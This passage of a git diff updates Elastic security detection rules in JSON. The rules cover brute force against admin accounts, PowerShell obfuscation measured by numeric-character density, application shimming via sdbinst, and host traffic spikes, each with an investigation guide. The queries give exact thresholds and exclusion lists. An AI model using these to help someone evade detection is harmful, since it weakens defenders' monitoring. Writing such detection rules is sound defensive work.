or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 5 + }, + "id": "f9753455-8d55-4ad8-b70a-e07b6f18deea_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_112.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_112.json deleted file mode 100644 index 5bd21b354f9..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_112.json +++ /dev/null @@ -1,108 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies multiple consecutive logon failures targeting an Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.Status", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.logon.type", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 112 - }, - "id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029_112", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_7.json b/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_7.json new file mode 100644 index 00000000000..ba064c79012 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_7.json @@ -0,0 +1,183 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts with a disproportionately high number of numeric characters, often indicating the presence of obfuscated or encoded payloads. This behavior is typical of obfuscation methods involving byte arrays, character code manipulation, or embedded encoded strings used to deliver and execute malicious content.", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via High Numeric Character Proportion", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via High Numeric Character Proportion\n\nPowerShell is a powerful scripting language used for system administration, but adversaries exploit its capabilities to obfuscate malicious scripts. Obfuscation often involves encoding payloads using numeric characters, making detection challenging. The detection rule identifies scripts with a high proportion of numeric characters, signaling potential obfuscation. By analyzing script length and numeric density, it flags suspicious activity, aiding in defense evasion detection.\n\n### Possible investigation steps\n\n- Review the script block text from the alert to understand the context and identify any obvious signs of obfuscation or malicious intent.\n- Examine the file path and host name fields to determine the origin and location of the script execution, which can help assess the potential impact and scope.\n- Check the user ID and agent ID fields to identify the user and system involved, which may provide insights into whether the activity is expected or suspicious.\n- Analyze the powershell.sequence and powershell.total fields to understand the sequence of script execution and the total number of scripts executed, which can indicate whether this is part of a larger pattern of behavior.\n- Investigate any related logs or alerts from the same host or user to identify patterns or correlations that might suggest broader malicious activity.\n\n### False positive analysis\n\n- Scripts with legitimate numeric-heavy content such as data processing or mathematical calculations may trigger the rule. To handle this, identify and whitelist specific scripts or script patterns that are known to be safe.\n- Automated scripts that generate or manipulate large datasets often contain high numeric content. Consider creating exceptions for scripts executed by trusted users or from known safe directories.\n- PowerShell scripts used for legitimate software installations or updates might include encoded data blocks. Review and exclude these scripts by verifying their source and purpose.\n- Scripts containing large hexadecimal strings for legitimate purposes, such as cryptographic operations, may be flagged. Use the exclusion pattern to filter out these known safe operations.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and any new legitimate scripts that may be introduced.\n\n### Response and remediation\n\n- Immediately isolate the affected host to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Review the PowerShell script block text and script block ID to identify any malicious payloads or encoded strings. If confirmed malicious, remove or quarantine the script.\n- Conduct a thorough scan of the isolated host using updated antivirus and anti-malware tools to detect and remove any additional threats or remnants of the obfuscated script.\n- Analyze the file path and user ID associated with the script execution to determine if unauthorized access or privilege escalation occurred. Revoke any suspicious user access and reset credentials if necessary.\n- Escalate the incident to the security operations center (SOC) for further investigation and correlation with other alerts to assess the scope and impact of the threat across the network.\n- Implement enhanced monitoring and logging for PowerShell activities on all endpoints to detect similar obfuscation attempts in the future, focusing on scripts with high numeric character proportions.\n- Review and update endpoint protection policies to restrict the execution of scripts with high numeric density, ensuring compliance with security best practices and reducing the risk of obfuscation-based attacks.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[0-9]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_pattern_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_ratio,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.directory,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high numeric character ratio\n| where Esql.script_block_ratio > 0.30\n\n// Exclude Windows Defender Noisy Patterns\n| where not (\n file.directory == \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\" or\n file.directory like \"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection*\"\n )\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n| where not powershell.file.script_block_text like \"*[System.IO.File]::Open('C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection*\"\n| where not powershell.file.script_block_text : \"26a24ae4-039d-4ca4-87b4-2f64180311f0\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_ratio", + "type": "double" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f9abcddc-a05d-4345-a81d-000b79aa5525", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 7 + }, + "id": "f9abcddc-a05d-4345-a81d-000b79aa5525_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fcd2e4be-6ec4-482f-9222-6245367cd738_2.json b/packages/security_detection_engine/kibana/security_rule/fcd2e4be-6ec4-482f-9222-6245367cd738_2.json index 81cee43d6b8..70c416ec711 100644 --- a/packages/security_detection_engine/kibana/security_rule/fcd2e4be-6ec4-482f-9222-6245367cd738_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fcd2e4be-6ec4-482f-9222-6245367cd738_2.json @@ -22,7 +22,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_317.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_317.json new file mode 100644 index 00000000000..fc2df7c5056 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_317.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Application Shimming via Sdbinst", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Application Shimming via Sdbinst\n\nApplication shimming is a Windows feature designed to ensure software compatibility across different OS versions. However, attackers exploit this by using the `sdbinst.exe` tool to execute malicious code under the guise of legitimate processes, achieving persistence. The detection rule identifies suspicious invocations of `sdbinst.exe` by filtering out benign arguments, flagging potential misuse for further investigation.\n\n### Possible investigation steps\n\n- Review the process execution details to confirm the presence of sdbinst.exe with suspicious arguments that do not include the benign flags -m, -bg, or -mm.\n- Investigate the parent process of sdbinst.exe to determine if it is a legitimate and expected process or if it is potentially malicious.\n- Check the timeline of events around the execution of sdbinst.exe to identify any related or preceding suspicious activities, such as unusual file modifications or network connections.\n- Analyze the user account associated with the execution of sdbinst.exe to verify if it is a legitimate user and if there are any signs of account compromise.\n- Examine the system for any newly installed or modified application compatibility databases (.sdb files) that could be associated with the suspicious execution of sdbinst.exe.\n- Correlate the alert with other security tools and logs, such as Microsoft Defender for Endpoint or Sysmon, to gather additional context and confirm the presence of malicious activity.\n\n### False positive analysis\n\n- Legitimate software installations or updates may trigger sdbinst.exe with arguments that are not typically malicious. Users should verify the source and purpose of the software to determine if it is expected behavior.\n- System administrators might use sdbinst.exe for deploying compatibility fixes across an organization. In such cases, document these activities and create exceptions for known administrative tasks.\n- Some enterprise applications may use sdbinst.exe as part of their normal operation. Identify these applications and exclude their specific command-line arguments from triggering alerts.\n- Scheduled tasks or scripts that include sdbinst.exe for maintenance purposes can be a source of false positives. Review these tasks and scripts, and whitelist them if they are part of routine operations.\n- Regularly review and update the list of exceptions to ensure that only verified and necessary exclusions are maintained, minimizing the risk of overlooking genuine threats.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further malicious activity and lateral movement.\n- Terminate any suspicious processes associated with `sdbinst.exe` that do not match known legitimate usage patterns.\n- Remove any unauthorized or suspicious application compatibility databases (.sdb files) that may have been installed using `sdbinst.exe`.\n- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional malicious files or persistence mechanisms.\n- Review and restore any altered system configurations or registry settings to their default or secure state.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems are affected.\n- Implement enhanced monitoring and logging for `sdbinst.exe` executions across the network to detect and respond to future attempts at application shimming.", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"sdbinst.exe\" and\n process.args : \"?*\" and\n not (process.args : \"-m\" and process.args : \"-bg\") and\n not process.args : (\n \"-mm\",\n \"?:\\\\Program Files\\\\WindowsApps\\\\Microsoft.ApplicationCompatibilityEnhancements_*\\\\sdb\\\\sysMergeInboxStoreApp.sdb\",\n \"\\\"?:\\\\Program Files\\\\WindowsApps\\\\Microsoft.ApplicationCompatibilityEnhancements_*\\\\sdb\\\\sysMergeInboxStoreApp.sdb\\\"\",\n \"?:\\\\Program Files\\\\WindowsApps\\\\Microsoft.ApplicationCompatibilityEnhancements_*\\\\sdb\\\\msiMergeInboxStoreApp.sdb\",\n \"\\\"?:\\\\Program Files\\\\WindowsApps\\\\Microsoft.ApplicationCompatibilityEnhancements_*\\\\sdb\\\\msiMergeInboxStoreApp.sdb\\\"\",\n \"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\CitrixWorkspaceLegacySWDA.sdb\",\n \"Citrix Workspace\",\n \"C:\\\\Program Files\\\\IIS Express\\\\iisexpressshim.sdb\",\n \"C:\\\\Program Files (x86)\\\\IIS Express\\\\iisexpressshim.sdb\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 317 + }, + "id": "fd4a992d-6130-4802-9ff8-829b89ae801f_317", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe8d6507-b543-4bbc-849f-dc0da6db29f6_4.json b/packages/security_detection_engine/kibana/security_rule/fe8d6507-b543-4bbc-849f-dc0da6db29f6_4.json new file mode 100644 index 00000000000..5d25973d251 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fe8d6507-b543-4bbc-849f-dc0da6db29f6_4.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a sudden spike in host based traffic. This can be due to a range of security issues, such as a compromised system, DDoS attacks, malware infections, privilege escalation, or data exfiltration.", + "false_positives": [ + "System updates, scheduled backups, or misconfigured services may trigger this alert." + ], + "from": "now-1h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "high_count_events_for_a_host_name", + "name": "Spike in host-based traffic", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Spike in host-based traffic\nThe detection of a spike in host-based traffic leverages machine learning to identify anomalies in network behavior, which may indicate security threats like DDoS attacks or data exfiltration. Adversaries exploit this by overwhelming systems or stealthily transferring data. The rule, with a low severity score, flags unusual traffic patterns, enabling analysts to investigate potential compromises or misconfigurations.\n\n### Possible investigation steps\n\n- Review the timestamp and source of the traffic spike to determine the exact time and origin of the anomaly.\n- Analyze the affected host's network logs to identify any unusual outbound or inbound connections that coincide with the spike.\n- Check for any recent changes or updates on the affected host that might have triggered the spike, such as software installations or configuration changes.\n- Investigate any associated user accounts for signs of unauthorized access or privilege escalation activities.\n- Correlate the spike with other security alerts or logs to identify potential patterns or related incidents.\n- Assess the host for signs of malware infection or indicators of compromise that could explain the abnormal traffic behavior.\n\n### False positive analysis\n\n- Routine software updates or patch management activities can cause temporary spikes in host-based traffic. Users should monitor scheduled update times and create exceptions for these periods to avoid false positives.\n- Backup operations often generate increased network traffic. Identifying and excluding these regular backup windows from monitoring can help reduce false alerts.\n- High-volume data transfers within the organization, such as large file uploads or downloads for legitimate business purposes, may trigger the rule. Establishing baseline traffic patterns for these activities and setting exceptions can mitigate unnecessary alerts.\n- Automated scripts or batch processes that run at specific times and generate predictable traffic spikes should be documented and excluded from anomaly detection to prevent false positives.\n- Internal network scans or vulnerability assessments conducted by IT security teams can mimic malicious traffic patterns. These should be scheduled and whitelisted to avoid triggering the rule.\n\n### Response and remediation\n\n- Isolate the affected host from the network to prevent further data exfiltration or participation in a DDoS attack.\n- Conduct a thorough scan of the isolated host for malware or unauthorized software, and remove any malicious files or applications found.\n- Review and reset credentials for any accounts that may have been compromised, ensuring that privilege escalation is mitigated.\n- Monitor network traffic for any additional anomalies or spikes that could indicate further compromise or ongoing attacks.\n- Restore the affected host from a known good backup if malware or significant unauthorized changes are detected.\n- Implement network segmentation to limit the spread of potential threats and reduce the impact of similar incidents in the future.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional resources are needed for a comprehensive response.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "risk_score": 21, + "rule_id": "fe8d6507-b543-4bbc-849f-dc0da6db29f6", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1498", + "name": "Network Denial of Service", + "reference": "https://attack.mitre.org/techniques/T1498/" + }, + { + "id": "T1499", + "name": "Endpoint Denial of Service", + "reference": "https://attack.mitre.org/techniques/T1499/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "fe8d6507-b543-4bbc-849f-dc0da6db29f6_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_210.json 